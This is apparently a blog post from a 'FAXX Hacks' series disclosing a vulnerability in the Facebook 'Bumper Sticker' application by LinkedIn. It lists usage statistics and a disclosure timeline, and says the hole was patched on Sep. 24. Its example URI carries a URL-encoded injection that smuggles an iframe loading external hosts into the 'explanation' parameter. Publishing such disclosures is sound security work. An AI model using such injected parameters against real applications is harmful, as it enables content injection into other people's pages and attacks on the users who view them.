Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Bumper Sticker
Double hacks tomorrow to make up for Monday’s break.
Facebook Verified Application
Current Monthly Active Users: 5,422,286
Current Rank on Application Leaderboard: 29
Application Developer: LinkedIn
Responsiveness: I sent this hole to Facebook on Sep. 1, then followed up with an e-mail to LinkedIn over the weekend.
Vulnerability Status: Unpatched Patched Sep. 24
Capable of Clickjacking Install: No
Example URI: http://apps.new.facebook.com/bumpersticker/stickers/show/60441592?confirm_add=1&explanation=%3Cfb%3Aiframe+src%3D%22http%3A%2F%2F11piecesofflare.com%2Fstickers%2Fshow%2F60441592%3Fconfirm_add%3D1%26explanation%3D%253Ciframe%2Bsrc%253D%2522http%253A%252F%252Ffbl.li%252Fr%252F%2522%253E%22%3E